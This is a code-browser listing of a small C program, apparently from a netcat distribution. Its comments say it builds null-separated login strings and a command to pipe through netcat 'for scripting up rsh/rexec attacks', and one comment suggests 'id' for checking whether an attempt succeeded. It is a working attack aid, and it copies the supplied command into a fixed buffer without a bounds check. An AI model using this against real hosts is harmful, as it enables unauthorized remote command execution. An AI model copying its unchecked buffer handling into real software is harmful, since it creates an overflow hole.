Home | History | Annotate | Download | only in data 
      1 /* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
      2    rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.
      3 
      4    args:
      5 	locuser remuser [cmd]
      6 	remuser passwd [cmd]
      7 
      8    cmd defaults to "pwd".
      9 
     10    ... whatever.  _H*/
     11 
     12 #include <stdio.h>
     13 
     14 /* change if you like; "id" is a good one for figuring out if you won too */
     15 static char cmd[] = "pwd";
     16 
     17 static char buf [256];
     18 
     19 main(argc, argv)
     20   int argc;
     21   char * argv[];
     22 {
     23   register int x;
     24   register int y;
     25   char * p;
     26   char * q;
     27 
     28   p = buf;
     29   memset (buf, 0, 256);
     30 
     31   p++;				/* first null */
     32   y = 1;
     33 
     34   if (! argv[1])
     35     goto wrong;
     36   x = strlen (argv[1]);
     37   memcpy (p, argv[1], x);	/* first arg plus another null */
     38   x++;
     39   p += x;
     40   y += x;
     41 
     42   if (! argv[2])
     43     goto wrong;
     44   x = strlen (argv[2]);
     45   memcpy (p, argv[2], x);	/* second arg plus null */
     46   x++;
     47   p += x;
     48   y += x;
     49 
     50   q = cmd;
     51   if (argv[3])
     52     q = argv[3];
     53   x = strlen (q);		/* not checked -- bfd */
     54   memcpy (p, q, x);		/* the command, plus final null */
     55   x++;
     56   p += x;
     57   y += x;
     58 
     59   memcpy (p, "\n", 1);		/* and a newline, so it goes */
     60   y++;
     61 
     62   write (1, buf, y);		/* zot! */
     63   exit (0);
     64 
     65 wrong:
     66   fprintf (stderr, "wrong!  needs 2 or more args.\n");
     67   exit (1);
     68 }
     69